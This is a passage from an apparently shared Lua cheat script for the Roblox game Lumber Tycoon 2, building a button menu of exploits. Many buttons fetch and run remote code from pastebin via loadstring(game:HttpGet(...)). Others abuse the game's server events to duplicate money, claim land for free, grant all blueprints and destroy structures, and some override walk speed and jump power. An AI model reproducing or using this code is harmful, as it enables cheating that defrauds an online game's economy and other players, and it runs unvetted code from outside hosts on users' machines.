  2794. OpenFrame.Visible = true
  2795. loadstring(game:HttpGet('https://pastebin.com/raw/QS7Te9aP',true))()
  2796. end)
  2797.  
  2798. local BringUp = Instance.new("TextButton")
  2799.  
  2800. BringUp.Name = "BringUp"
  2801. BringUp.Parent = CopyFrame
  2802. BringUp.BackgroundColor3 = Color3.new(0, 0, 0)
  2803. BringUp.BorderColor3 = Color3.new(0, 0, 0)
  2804. BringUp.Position = UDim2.new(0, 3, 0, 256)
  2805. BringUp.Size = UDim2.new(0, 165, 0, 20)
  2806. BringUp.Font = Enum.Font.Fantasy
  2807. BringUp.FontSize = Enum.FontSize.Size18
  2808. BringUp.Text = "BringUp"
  2809. BringUp.TextColor3 = Color3.new(255, 0, 0)
  2810. BringUp.TextSize = 15
  2811. BringUp.MouseButton1Down:connect(function()
  2812. makesound("rbxassetid://156785206")
  2813. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2814. wait(2.5)
  2815. MainFrame.Visible = false
  2816. OpenFrame.Visible = true
  2817. loadstring(game:GetObjects("rbxassetid://01925396229")[1].Source)()
  2818. end)
  2819.  
  2820.  
  2821. Slot.Name = "Slot"
  2822. Slot.Parent = CopyFrame
  2823. Slot.BackgroundColor3 = Color3.new(0, 0, 0)
  2824. Slot.BorderColor3 = Color3.new(0, 0, 0)
  2825. Slot.Position = UDim2.new(0, 3, 0, 279)
  2826. Slot.Size = UDim2.new(0, 165, 0, 20)
  2827. Slot.Font = Enum.Font.Fantasy
  2828. Slot.FontSize = Enum.FontSize.Size18
  2829. Slot.Text = "Base Slot Number "
  2830. Slot.TextColor3 = Color3.new(1, 1, 1)
  2831. Slot.TextSize = 15
  2832.  
  2833. --Locals
  2834. local MoneyCooldown = false
  2835. local CurrentSlot = game.Players.LocalPlayer:WaitForChild("CurrentSaveSlot").Value
  2836. local ScriptLoad = false
  2837. local CurrentlySavingOrLoading = game.Players.LocalPlayer:WaitForChild("CurrentlySavingOrLoading")
  2838.  
  2839. --Functions
  2840. local function CheckIfSlotAvailable(Slot)
  2841. for a,b in pairs(game.ReplicatedStorage.LoadSaveRequests.GetMetaData:InvokeServer(game.Players.LocalPlayer)) do
  2842. if a == Slot then
  2843. for c,d in pairs(b) do
  2844. if c == "NumSaves" and d ~= 0 then
  2845. return true
  2846. else
  2847. return false
  2848. end
  2849. end
  2850. end
  2851. end
  2852. end
  2853.  
  2854. local function CheckSlotNumber() --Checks if the slot number is right
  2855. if Slot.Text == "1" or Slot.Text == "2" or Slot.Text == "3" or Slot.Text == "4" or Slot.Text == "5" or Slot.Text == "6" then
  2856. local SlotNumber = tonumber(Slot.Text)
  2857. return SlotNumber
  2858. else return false
  2859. end
  2860. end
  2861.  
  2862. local function SendNotification(Title,Text,Duration) -- Sends Notification in the bottom right of the screen
  2863. game.StarterGui:SetCore("SendNotification", {
  2864. Title = Title;
  2865. Text = Text;
  2866. Icon = nil;
  2867. Duration = Duration
  2868. })
  2869. end
  2870.  
  2871. DMoney.Name = "DMoney"
  2872. DMoney.Parent = CopyFrame
  2873. DMoney.BackgroundColor3 = Color3.new(0, 0, 0)
  2874. DMoney.BorderColor3 = Color3.new(0, 0, 0)
  2875. DMoney.Position = UDim2.new(0, 3, 0, 302)
  2876. DMoney.Size = UDim2.new(0, 90, 0, 20)
  2877. DMoney.Font = Enum.Font.Fantasy
  2878. DMoney.FontSize = Enum.FontSize.Size18
  2879. DMoney.Text = "Dupe Money"
  2880. DMoney.TextColor3 = Color3.new(255, 0, 0)
  2881. DMoney.TextSize = 15
  2882. DMoney.MouseButton1Down:connect(function() --Sends the money and will come back after around 2 mins
  2883. makesound("rbxassetid://156785206")
  2884. if MoneyCooldown == true then
  2885. SendNotification("Cooldown Notification", "Wait for your Money to come back",2)
  2886. return
  2887. elseif MoneyCooldown == false then
  2888. MoneyCooldown = true
  2889. SendNotification("Money Sent", "Wait about 2 minutes for your Money to come back", 5)
  2890. game.ReplicatedStorage.Transactions.ClientToServer.Donate:InvokeServer(game.Players.LocalPlayer, game.Players.LocalPlayer.leaderstats.Money.Value, 1)
  2891. SendNotification("Money Received", "You received your money that you have sent earlier", 5)
  2892. MoneyCooldown = false
  2893. end
  2894. end)
  2895.  
  2896. Load.Name = "Load"
  2897. Load.Parent = CopyFrame
  2898. Load.BackgroundColor3 = Color3.new(0, 0, 0)
  2899. Load.BorderColor3 = Color3.new(0, 0, 0)
  2900. Load.Position = UDim2.new(0, 97, 0, 312)
  2901. Load.Size = UDim2.new(0, 70, 0, 20)
  2902. Load.Font = Enum.Font.Fantasy
  2903. Load.FontSize = Enum.FontSize.Size18
  2904. Load.Text = "Load Slot"
  2905. Load.TextColor3 = Color3.new(1, 1, 1)
  2906. Load.TextSize = 15
  2907. Load.MouseButton1Down:connect(function() --Loads the slot you want
  2908. makesound("rbxassetid://156785206")
  2909. ScriptLoad = true
  2910. local CheckSlot = CheckSlotNumber()
  2911. if CheckSlot ~= false then
  2912. if CheckIfSlotAvailable(CheckSlot) == true then
  2913. local LoadSlot = game.ReplicatedStorage.LoadSaveRequests.RequestLoad:InvokeServer(CheckSlot)
  2914. if LoadSlot == false then
  2915. SendNotification("Cooldown Notification", "You aren't abled to load now", 1)
  2916. end
  2917. if LoadSlot == true then
  2918. SendNotification("Reload Notification", "Loaded Your Slot", 2)
  2919. CurrentSlot = CheckSlot
  2920. end
  2921. else
  2922. SendNotification("Slot not Available", "This Slot is not Available, please choose another slot", 2)
  2923. end
  2924. else
  2925. SendNotification("Incorrect Slot", "Enter a Valid number in the upper field", 1)
  2926. end
  2927. ScriptLoad = false
  2928. end)
  2929.  
  2930. Store.Name = "Store"
  2931. Store.Parent = CopyFrame
  2932. Store.BackgroundColor3 = Color3.new(0, 0, 0)
  2933. Store.BorderColor3 = Color3.new(0, 0, 0)
  2934. Store.Position = UDim2.new(0, 3, 0, 325)
  2935. Store.Size = UDim2.new(0, 90, 0, 20)
  2936. Store.Font = Enum.Font.Fantasy
  2937. Store.FontSize = Enum.FontSize.Size18
  2938. Store.Text = "Store Axe"
  2939. Store.TextColor3 = Color3.new(255, 0, 0)
  2940. Store.TextSize = 15
  2941. Store.MouseButton1Down:connect(function() --Stores the Axes somewhere so you can restore them later
  2942. makesound("rbxassetid://156785206")
  2943. Amount = 0
  2944. for a,b in pairs(game.Players.LocalPlayer.Backpack:GetChildren())do
  2945. if b.Name ~= "BlueprintTool" and b.Name == "Tool" then
  2946. b.Parent = game.Players.LocalPlayer
  2947. Amount = Amount + 1
  2948. end
  2949. end
  2950. SendNotification("Store Notification", "Stored "..Amount.." Axes, you can restore them later", 2)
  2951. end)
  2952.  
  2953. Restore.Name = "Restore"
  2954. Restore.Parent = CopyFrame
  2955. Restore.BackgroundColor3 = Color3.new(0, 0, 0)
  2956. Restore.BorderColor3 = Color3.new(0, 0, 0)
  2957. Restore.Position = UDim2.new(0, 3, 0, 348)
  2958. Restore.Size = UDim2.new(0, 165, 0, 20)
  2959. Restore.Font = Enum.Font.Fantasy
  2960. Restore.FontSize = Enum.FontSize.Size18
  2961. Restore.Text = "Restore Axe"
  2962. Restore.TextColor3 = Color3.new(1, 1, 1)
  2963. Restore.TextSize = 15
  2964. Restore.MouseButton1Down:connect(function() --Restores the axes that you stored with the Store function
  2965. makesound("rbxassetid://156785206")
  2966. Amount = 0
  2967. for a,b in pairs(game.Players.LocalPlayer:GetChildren()) do
  2968. if b.Name ~= "BlueprintTool" and b.Name == "Tool" then
  2969. b.Parent = game.Players.LocalPlayer.Backpack
  2970. Amount = Amount + 1
  2971. end
  2972. end
  2973. SendNotification("Restore Notification", "Restored "..Amount.." Axes that you Stored", 2)
  2974. end)
  2975.  
  2976. SaveSlot.Name = "SaveSlot"
  2977. SaveSlot.Parent = CopyFrame
  2978. SaveSlot.BackgroundColor3 = Color3.new(0, 0, 0)
  2979. SaveSlot.BorderColor3 = Color3.new(0, 0, 0)
  2980. SaveSlot.Position = UDim2.new(0, 3, 0, 371)
  2981. SaveSlot.Size = UDim2.new(0, 165, 0, 20)
  2982. SaveSlot.Font = Enum.Font.Fantasy
  2983. SaveSlot.FontSize = Enum.FontSize.Size18
  2984. SaveSlot.Text = "SaveSlot "
  2985. SaveSlot.TextColor3 = Color3.new(1, 1, 1)
  2986. SaveSlot.TextSize = 15
  2987. SaveSlot.MouseButton1Down:connect(function() --Saves the slot that you want
  2988. makesound("rbxassetid://156785206")
  2989. local CheckSlot = CheckSlotNumber()
  2990. if CheckSlot ~= false then
  2991. if CurrentSlot ~= -1 then
  2992. local SaveSlot = game.ReplicatedStorage.LoadSaveRequests.RequestSave:InvokeServer(CheckSlot)
  2993. if SaveSlot == true then
  2994. SendNotification("Save Notification", "Saved your Slot", 2)
  2995. elseif SaveSlot == false then
  2996. SendNotification("Already Saving", "Saving/Loading is currently in Progress", 1)
  2997. end
  2998. else
  2999. SendNotification("Error", "Load Your Slot First before saving", 1)
  3000. end
  3001. else
  3002. SendNotification("Incorrect Slot", "Enter a number in the upper field", 1)
  3003. end
  3004. end)
  3005.  
  3006. DropAxes.Name = "DropAxes"
  3007. DropAxes.Parent = CopyFrame
  3008. DropAxes.BackgroundColor3 = Color3.new(0, 0, 0)
  3009. DropAxes.BorderColor3 = Color3.new(0, 0, 0)
  3010. DropAxes.Position = UDim2.new(0, 3, 0, 417)
  3011. DropAxes.Size = UDim2.new(0, 165, 0, 20)
  3012. DropAxes.Font = Enum.Font.Fantasy
  3013. DropAxes.FontSize = Enum.FontSize.Size18
  3014. DropAxes.Text = "Drop Axes "
  3015. DropAxes.TextColor3 = Color3.new(255, 0, 0)
  3016. DropAxes.TextSize = 15
  3017. DropAxes.MouseButton1Down:connect(function() --Drops all your Axes
  3018. makesound("rbxassetid://156785206")
  3019. Amount = 0
  3020. for a,b in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  3021. if b.Name ~= "BlueprintTool" and b.Name == "Tool" then
  3022. game.ReplicatedStorage.Interaction.ClientInteracted:FireServer(b, "Drop tool", game.Players.LocalPlayer.Character.Head.CFrame)
  3023. Amount = Amount + 1
  3024. end
  3025. end
  3026. SendNotification("Axe Dropped", "Dropped "..Amount.." Axes from your Backpack",5)
  3027. end)
  3028.  
  3029. CountAxes.Name = "CountAxes"
  3030. CountAxes.Parent = CopyFrame
  3031. CountAxes.BackgroundColor3 = Color3.new(0, 0, 0)
  3032. CountAxes.BorderColor3 = Color3.new(0, 0, 0)
  3033. CountAxes.Position = UDim2.new(0, 3, 0, 394)
  3034. CountAxes.Size = UDim2.new(0, 165, 0, 20)
  3035. CountAxes.Font = Enum.Font.Fantasy
  3036. CountAxes.FontSize = Enum.FontSize.Size18
  3037. CountAxes.Text = "Count Axes "
  3038. CountAxes.TextColor3 = Color3.new(255, 0, 0)
  3039. CountAxes.TextSize = 15
  3040. CountAxes.MouseButton1Down:connect(function() --Counts Axes in your Backpack (Equiped Axes dont Count)
  3041. makesound("rbxassetid://156785206")
  3042. Amount = 0
  3043. for a,b in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  3044. if b.Name ~= "BlueprintTool" and b.Name == "Tool" then
  3045. Amount = Amount + 1
  3046. end
  3047. end
  3048. SendNotification("Axe Amount", "You have "..Amount.." Axes in your Backpack",2)
  3049. end)
  3050.  
  3051. Artmenu.Name = "Artmenu"
  3052. Artmenu.Parent = Picker
  3053. Artmenu.BackgroundColor3 = Color3.new(1, 1, 1)
  3054. Artmenu.BorderColor3 = Color3.new(0, 0, 0)
  3055. Artmenu.Position = UDim2.new(0, 15, 0, 345)
  3056. Artmenu.Size = UDim2.new(0, 80, 0, 80)
  3057. Artmenu.ZIndex = 3
  3058. Artmenu.Image = "rbxassetid://3907587419"
  3059. Artmenu.ScaleType = Enum.ScaleType.Crop
  3060. Artmenu.MouseButton1Click:Connect(function()
  3061. CurrentItem.Image = "rbxassetid://3886256996"
  3062. makesound("rbxassetid://156785206")
  3063. AIntroImage.Visible = true
  3064. AIntroImage1.Visible = true
  3065. end)
  3066.  
  3067.  
  3068. ArtFrame.Name = "ArtFrame"
  3069. ArtFrame.Parent = MenuFrame
  3070. ArtFrame.BorderSizePixel = 1
  3071. ArtFrame.BackgroundTransparency = 0
  3072. ArtFrame.BorderColor3 = Color3.new(0, 0, 0)
  3073. ArtFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  3074. ArtFrame.Size = UDim2.new(0, 170, 0, 280)
  3075. ArtFrame.Visible = false
  3076.  
  3077. Paint.Name = "Paint"
  3078. Paint.Parent = ArtFrame
  3079. Paint.BackgroundColor3 = Color3.new(0, 0, 0)
  3080. Paint.BorderColor3 = Color3.new(0, 0, 0)
  3081. Paint.Position = UDim2.new(0, 3, 0, 3)
  3082. Paint.Size = UDim2.new(0, 165, 0, 20)
  3083. Paint.Font = Enum.Font.Fantasy
  3084. Paint.Text = "Paint"
  3085. Paint.TextColor3 = Color3.new(255, 0, 0)
  3086. Paint.TextSize = 15
  3087. Paint.MouseButton1Down:connect(function()
  3088. makesound("rbxassetid://156785206")
  3089. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  3090. wait(2.5)
  3091. MainFrame.Visible = false
  3092. OpenFrame.Visible = true
  3093. loadstring(game:HttpGet('https://pastebin.com/raw/KwtFxY8L',true))()
  3094. end)
  3095.  
  3096.  
  3097. PaintFill.Name = "PaintFill"
  3098. PaintFill.Parent = ArtFrame
  3099. PaintFill.BackgroundColor3 = Color3.new(0, 0, 0)
  3100. PaintFill.BorderColor3 = Color3.new(0, 0, 0)
  3101. PaintFill.Position = UDim2.new(0, 3, 0, 26)
  3102. PaintFill.Size = UDim2.new(0, 165, 0, 20)
  3103. PaintFill.Font = Enum.Font.Fantasy
  3104. PaintFill.FontSize = Enum.FontSize.Size18
  3105. PaintFill.Text = "Paint Fill"
  3106. PaintFill.TextColor3 = Color3.new(255, 0, 0)
  3107. PaintFill.TextSize = 15
  3108. PaintFill.MouseButton1Down:connect(function()
  3109. makesound("rbxassetid://156785206")
  3110. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  3111. wait(2.5)
  3112. MainFrame.Visible = false
  3113. OpenFrame.Visible = true
  3114. loadstring(game:HttpGet('https://pastebin.com/raw/sc0gEqX5',true))()
  3115. end)
  3116.  
  3117.  
  3118.  
  3119. BaseFLOOR.Name = "BaseFLOOR"
  3120. BaseFLOOR.Parent = ArtFrame
  3121. BaseFLOOR.BackgroundColor3 = Color3.new(0, 0, 0)
  3122. BaseFLOOR.BorderColor3 = Color3.new(0, 0, 0)
  3123. BaseFLOOR.Position = UDim2.new(0, 3, 0, 49)
  3124. BaseFLOOR.Size = UDim2.new(0, 165, 0, 20)
  3125. BaseFLOOR.Font = Enum.Font.Fantasy
  3126. BaseFLOOR.FontSize = Enum.FontSize.Size18
  3127. BaseFLOOR.Text = "Base Floor Prints"
  3128. BaseFLOOR.TextColor3 = Color3.new(255, 0, 0)
  3129. BaseFLOOR.TextSize = 15
  3130. BaseFLOOR.MouseButton1Down:connect(function()
  3131. makesound("rbxassetid://156785206")
  3132. loadstring(game:HttpGet('https://pastebin.com/raw/M4qfj349',true))()
  3133.  
  3134. end)
  3135.  
  3136. SingleWalls.Name = "SingleWalls"
  3137. SingleWalls.Parent = ArtFrame
  3138. SingleWalls.BackgroundColor3 = Color3.new(0, 0, 0)
  3139. SingleWalls.BorderColor3 = Color3.new(0, 0, 0)
  3140. SingleWalls.Position = UDim2.new(0, 3, 0, 72)
  3141. SingleWalls.Size = UDim2.new(0, 165, 0, 20)
  3142. SingleWalls.Font = Enum.Font.Fantasy
  3143. SingleWalls.FontSize = Enum.FontSize.Size18
  3144. SingleWalls.Text = "Single Wall Prints"
  3145. SingleWalls.TextColor3 = Color3.new(255, 0, 0)
  3146. SingleWalls.TextSize = 15
  3147. SingleWalls.MouseButton1Down:connect(function()
  3148. makesound("rbxassetid://156785206")
  3149. loadstring(game:HttpGet('https://pastebin.com/raw/vaDSYZcr',true))()
  3150.  
  3151. end)
  3152.  
  3153. DoubleWalls.Name = "DoubleWalls"
  3154. DoubleWalls.Parent = ArtFrame
  3155. DoubleWalls.BackgroundColor3 = Color3.new(0, 0, 0)
  3156. DoubleWalls.BorderColor3 = Color3.new(0, 0, 0)
  3157. DoubleWalls.Position = UDim2.new(0, 3, 0, 95)
  3158. DoubleWalls.Size = UDim2.new(0, 165, 0, 20)
  3159. DoubleWalls.Font = Enum.Font.Fantasy
  3160. DoubleWalls.FontSize = Enum.FontSize.Size18
  3161. DoubleWalls.Text = "Double Wall Prints"
  3162. DoubleWalls.TextColor3 = Color3.new(255, 0, 0)
  3163. DoubleWalls.TextSize = 15
  3164. DoubleWalls.MouseButton1Down:connect(function()
  3165. makesound("rbxassetid://156785206")
  3166. loadstring(game:HttpGet('https://pastebin.com/raw/VMzdN1b1',true))()
  3167.  
  3168. end)
  3169.  
  3170. TripleWalls.Name = "TripleWalls"
  3171. TripleWalls.Parent = ArtFrame
  3172. TripleWalls.BackgroundColor3 = Color3.new(0, 0, 0)
  3173. TripleWalls.BorderColor3 = Color3.new(0, 0, 0)
  3174. TripleWalls.Position = UDim2.new(0, 3, 0, 118)
  3175. TripleWalls.Size = UDim2.new(0, 165, 0, 20)
  3176. TripleWalls.Font = Enum.Font.Fantasy
  3177. TripleWalls.FontSize = Enum.FontSize.Size18
  3178. TripleWalls.Text = "Triple Wall Prints"
  3179. TripleWalls.TextColor3 = Color3.new(255, 0, 0)
  3180. TripleWalls.TextSize = 15
  3181. TripleWalls.MouseButton1Down:connect(function()
  3182. makesound("rbxassetid://156785206")
  3183. loadstring(game:HttpGet('https://pastebin.com/raw/WGjKAWCp',true))()
  3184.  
  3185. end)
  3186.  
  3187. Hoofer.Name = "Hoofer"
  3188. Hoofer.Parent = ArtFrame
  3189. Hoofer.BackgroundColor3 = Color3.new(0, 0, 0)
  3190. Hoofer.BorderColor3 = Color3.new(0, 0, 0)
  3191. Hoofer.Position = UDim2.new(0, 3, 0, 141)
  3192. Hoofer.Size = UDim2.new(0, 165, 0, 20)
  3193. Hoofer.Font = Enum.Font.Fantasy
  3194. Hoofer.FontSize = Enum.FontSize.Size18
  3195. Hoofer.Text = "Hoofer Art Gui"
  3196. Hoofer.TextColor3 = Color3.new(255, 0, 0)
  3197. Hoofer.TextSize = 15
  3198. Hoofer.MouseButton1Down:connect(function()
  3199. makesound("rbxassetid://156785206")
  3200. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  3201. wait(2.5)
  3202. MainFrame.Visible = false
  3203. OpenFrame.Visible = true
  3204. loadstring(game:HttpGet('https://pastebin.com/raw/byWaCwR8',true))()
  3205. end)
  3206.  
  3207. Landart.Name = "Landart"
  3208. Landart.Parent = ArtFrame
  3209. Landart.BackgroundColor3 = Color3.new(0, 0, 0)
  3210. Landart.BorderColor3 = Color3.new(0, 0, 0)
  3211. Landart.Position = UDim2.new(0, 3, 0, 164)
  3212. Landart.Size = UDim2.new(0, 165, 0, 20)
  3213. Landart.Font = Enum.Font.Fantasy
  3214. Landart.FontSize = Enum.FontSize.Size18
  3215. Landart.Text = "Custom Land Art"
  3216. Landart.TextColor3 = Color3.new(255, 0, 0)
  3217. Landart.TextSize = 15
  3218. Landart.MouseButton1Down:connect(function()
  3219. makesound("rbxassetid://156785206")
  3220. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  3221. wait(2.5)
  3222. MainFrame.Visible = false
  3223. OpenFrame.Visible = true
  3224. loadstring(game:HttpGet('https://pastebin.com/raw/Thdycw8W',true))()
  3225. end)
  3226.  
  3227. BluePrints.Name = "BluePrints"
  3228. BluePrints.Parent = ArtFrame
  3229. BluePrints.BackgroundColor3 = Color3.new(0, 0, 0)
  3230. BluePrints.BorderColor3 = Color3.new(0, 0, 0)
  3231. BluePrints.Position = UDim2.new(0, 3, 0, 187)
  3232. BluePrints.Size = UDim2.new(0, 165, 0, 20)
  3233. BluePrints.Font = Enum.Font.Fantasy
  3234. BluePrints.FontSize = Enum.FontSize.Size18
  3235. BluePrints.Text = "BluePrints"
  3236. BluePrints.TextColor3 = Color3.new(255, 0, 0)
  3237. BluePrints.TextSize = 15
  3238. BluePrints.MouseButton1Down:connect(function()
  3239. makesound("rbxassetid://156785206")
  3240. for i,v in pairs(game.ReplicatedStorage.Purchasables.Structures.BlueprintStructures:GetChildren()) do
  3241. local clone = v:Clone()
  3242. clone.Parent = game.Players.LocalPlayer.PlayerBlueprints.Blueprints
  3243. end
  3244. end)
  3245.  
  3246.  
  3247. MaxLand.Name = "MaxLand"
  3248. MaxLand.Parent = ArtFrame
  3249. MaxLand.BackgroundColor3 = Color3.new(0, 0, 0)
  3250. MaxLand.BorderColor3 = Color3.new(0, 0, 0)
  3251. MaxLand.Position = UDim2.new(0, 3, 0, 210)
  3252. MaxLand.Size = UDim2.new(0, 165, 0, 20)
  3253. MaxLand.Font = Enum.Font.Fantasy
  3254. MaxLand.FontSize = Enum.FontSize.Size18
  3255. MaxLand.Text = "MaxLand"
  3256. MaxLand.TextColor3 = Color3.new(255, 0, 0)
  3257. MaxLand.TextSize = 15
  3258. MaxLand.MouseButton1Down:connect(function()
  3259. makesound("rbxassetid://156785206")
  3260. for i, v in pairs(game:GetService("Workspace").Properties:GetChildren()) do
  3261. if v:FindFirstChild("Owner") and v.Owner.Value == game.Players.LocalPlayer then
  3262. base = v
  3263. square = v.OriginSquare
  3264. end
  3265. end
  3266. function makebase(pos)
  3267. local Event = game:GetService("ReplicatedStorage").PropertyPurchasing.ClientExpandedProperty
  3268. Event:FireServer(base, pos)
  3269. end
  3270. spos = square.Position
  3271. makebase(CFrame.new(spos.X + 40, spos.Y, spos.Z))
  3272. makebase(CFrame.new(spos.X - 40, spos.Y, spos.Z))
  3273. makebase(CFrame.new(spos.X, spos.Y, spos.Z + 40))
  3274. makebase(CFrame.new(spos.X, spos.Y, spos.Z - 40))
  3275. makebase(CFrame.new(spos.X + 40, spos.Y, spos.Z + 40))
  3276. makebase(CFrame.new(spos.X + 40, spos.Y, spos.Z - 40))
  3277. makebase(CFrame.new(spos.X - 40, spos.Y, spos.Z + 40))
  3278. makebase(CFrame.new(spos.X - 40, spos.Y, spos.Z - 40))
  3279. makebase(CFrame.new(spos.X + 80, spos.Y, spos.Z))
  3280. makebase(CFrame.new(spos.X - 80, spos.Y, spos.Z))
  3281. makebase(CFrame.new(spos.X, spos.Y, spos.Z + 80))
  3282. makebase(CFrame.new(spos.X, spos.Y, spos.Z - 80))
  3283. --Corners--
  3284. makebase(CFrame.new(spos.X + 80, spos.Y, spos.Z + 80))
  3285. makebase(CFrame.new(spos.X + 80, spos.Y, spos.Z - 80))
  3286. makebase(CFrame.new(spos.X - 80, spos.Y, spos.Z + 80))
  3287. makebase(CFrame.new(spos.X - 80, spos.Y, spos.Z - 80))
  3288. --Corners--
  3289. makebase(CFrame.new(spos.X + 40, spos.Y, spos.Z + 80))
  3290. makebase(CFrame.new(spos.X - 40, spos.Y, spos.Z + 80))
  3291. makebase(CFrame.new(spos.X + 80, spos.Y, spos.Z + 40))
  3292. makebase(CFrame.new(spos.X + 80, spos.Y, spos.Z - 40))
  3293. makebase(CFrame.new(spos.X - 80, spos.Y, spos.Z + 40))
  3294. makebase(CFrame.new(spos.X - 80, spos.Y, spos.Z - 40))
  3295. makebase(CFrame.new(spos.X + 40, spos.Y, spos.Z - 80))
  3296. makebase(CFrame.new(spos.X - 40, spos.Y, spos.Z - 80))
  3297.  
  3298. end)
  3299.  
  3300.  
  3301.  
  3302. WipeBase.Name = "WipeBase"
  3303. WipeBase.Parent = ArtFrame
  3304. WipeBase.BackgroundColor3 = Color3.new(0, 0, 0)
  3305. WipeBase.BorderColor3 = Color3.new(0, 0, 0)
  3306. WipeBase.Position = UDim2.new(0, 3, 0, 233)
  3307. WipeBase.Size = UDim2.new(0, 165, 0, 20)
  3308. WipeBase.Font = Enum.Font.Fantasy
  3309. WipeBase.FontSize = Enum.FontSize.Size18
  3310. WipeBase.Text = "Wipe Base"
  3311. WipeBase.TextColor3 = Color3.new(255, 0, 0)
  3312. WipeBase.TextSize = 15
  3313. WipeBase.MouseButton1Down:Connect(function()
  3314. makesound("rbxassetid://156785206")
  3315. plr = game.Players.LocalPlayer.Name
  3316. pmds = game.Workspace.PlayerModels
  3317. PlaceR = game.ReplicatedStorage.Interaction.DestroyStructure
  3318. for i, v in pairs(pmds:GetChildren()) do
  3319. if v:FindFirstChild("Owner") and v.Owner.Value ~= nil and v.Owner.Value == game.Players[plr] and v:FindFirstChild("ItemName") and v:FindFirstChild("Type") and (v.PrimaryPart ~= nil or v:FindFirstChild("MainCFrame")) then
  3320. PlaceR:FireServer(v)
  3321. end
  3322. end
  3323. end)
  3324.  
  3325. WCollide = "Nothing"
  3326.  
  3327. toolamenu.Name = "toolamenu"
  3328. toolamenu.Parent = Picker
  3329. toolamenu.BackgroundColor3 = Color3.new(1, 1, 1)
  3330. toolamenu.BorderColor3 = Color3.new(0, 0, 0)
  3331. toolamenu.Position = UDim2.new(0, 15, 0,430)
  3332. toolamenu.Size = UDim2.new(0, 80, 0, 80)
  3333. toolamenu.ZIndex = 3
  3334. toolamenu.Image = "rbxassetid://3916428981"
  3335. toolamenu.ScaleType = Enum.ScaleType.Crop
  3336. toolamenu.MouseButton1Click:Connect(function()
  3337. CurrentItem.Image = "rbxassetid://3886256996"
  3338. makesound("rbxassetid://156785206")
  3339. AIntroImage.Visible = false
  3340. AIntroImage1.Visible = false
  3341.  
  3342. end)
  3343.  
  3344. toolaFrame.Name = "toolaFrame"
  3345. toolaFrame.Parent = MenuFrame
  3346. toolaFrame.BorderSizePixel = 1
  3347. toolaFrame.BackgroundTransparency = 0
  3348. toolaFrame.BorderColor3 = Color3.new(0, 0, 0)
  3349. toolaFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  3350. toolaFrame.Size = UDim2.new(0, 170, 0, 442)
  3351. toolaFrame.Visible = false
  3352.  
  3353. JumpText.Name = "JumpText"
  3354. JumpText.Parent = toolaFrame
  3355. JumpText.BackgroundColor3 = Color3.new(0, 0, 0)
  3356. JumpText.BorderColor3 = Color3.new(0, 0, 0)
  3357. JumpText.Position = UDim2.new(0, 147, 0, 26)
  3358. JumpText.Size = UDim2.new(0, 21, 0, 20)
  3359. JumpText.Font = Enum.Font.Fantasy
  3360. JumpText.FontSize = Enum.FontSize.Size18
  3361. JumpText.Text = "50"
  3362. JumpText.TextColor3 = Color3.new(255, 0, 0)
  3363. JumpText.TextSize = 15
  3364.  
  3365. JumpPower.Name = "JumpPowerLabel"
  3366. JumpPower.Parent = toolaFrame
  3367. JumpPower.BackgroundColor3 = Color3.new(0, 0, 0)
  3368. JumpPower.BorderColor3 = Color3.new(0, 0, 0)
  3369. JumpPower.Position = UDim2.new(0, 3, 0, 26)
  3370. JumpPower.Size = UDim2.new(0, 140, 0, 20)
  3371. JumpPower.Font = Enum.Font.Fantasy
  3372. JumpPower.FontSize = Enum.FontSize.Size18
  3373. JumpPower.Text = "Jump Power"
  3374. JumpPower.TextColor3 = Color3.new(255, 0, 0)
  3375. JumpPower.TextSize = 15
  3376.  
  3377. player = game.Players.LocalPlayer
  3378. Jump = 50
  3379.  
  3380. JumpPower.MouseButton1Down:connect(function()
  3381. Jump = JumpText.Text
  3382. end)
  3383.  
  3384. player.Character.Humanoid.JumpPower = Jump
  3385.  
  3386. player.Character.Humanoid.Changed:connect(function()
  3387. player.Character.Humanoid.JumpPower = Jump
  3388.  
  3389. end)
  3390.  
  3391. WalkspeedLabel.Name = "WalkspeedLabel"
  3392. WalkspeedLabel.Parent = toolaFrame
  3393. WalkspeedLabel.BackgroundColor3 = Color3.new(0, 0, 0)
  3394. WalkspeedLabel.BorderColor3 = Color3.new(0, 0, 0)
  3395. WalkspeedLabel.Position = UDim2.new(0, 3, 0, 3)
  3396. WalkspeedLabel.Size = UDim2.new(0, 140, 0, 20)
  3397. WalkspeedLabel.Font = Enum.Font.Fantasy
  3398. WalkspeedLabel.FontSize = Enum.FontSize.Size18
  3399. WalkspeedLabel.Text = "Walkspeed"
  3400. WalkspeedLabel.TextColor3 = Color3.new(255, 0, 0)
  3401. WalkspeedLabel.TextSize = 15
  3402.  
  3403. WalkSpeed.Name = "WalkSpeed"
  3404. WalkSpeed.Parent = toolaFrame
  3405. WalkSpeed.BackgroundColor3 = Color3.new(0, 0, 0)
  3406. WalkSpeed.BorderColor3 = Color3.new(0, 0, 0)
  3407. WalkSpeed.Position = UDim2.new(0, 147, 0, 3)
  3408. WalkSpeed.Size = UDim2.new(0, 21, 0, 20)
  3409. WalkSpeed.Font = Enum.Font.Fantasy
  3410. WalkSpeed.FontSize = Enum.FontSize.Size18
  3411. WalkSpeed.Text = "V"
  3412. WalkSpeed.TextColor3 = Color3.new(255, 0, 0)
  3413. WalkSpeed.TextSize = 15
  3414.  
  3415. WalkspeedLabel.MouseButton1Down:connect(function()
  3416. local walkspeedplayer = game:GetService("Players").LocalPlayer
  3417. local walkspeedmouse = walkspeedplayer:GetMouse()
  3418.  
  3419. local walkspeedenabled = false
  3420.  
  3421. function x_walkspeed(key)
  3422. if (key == "v") then
  3423. if walkspeedenabled == false then
  3424. _G.WS = 150;
  3425.  
  3426. local Humanoid = game:GetService("Players").LocalPlayer.Character.Humanoid;
  3427. Humanoid:GetPropertyChangedSignal("WalkSpeed"):Connect(function()
  3428. Humanoid.WalkSpeed = _G.WS;
  3429. end)
  3430. Humanoid.WalkSpeed = _G.WS;
  3431.  
  3432. walkspeedenabled = true
  3433. elseif walkspeedenabled == true then
  3434. _G.WS = 15;
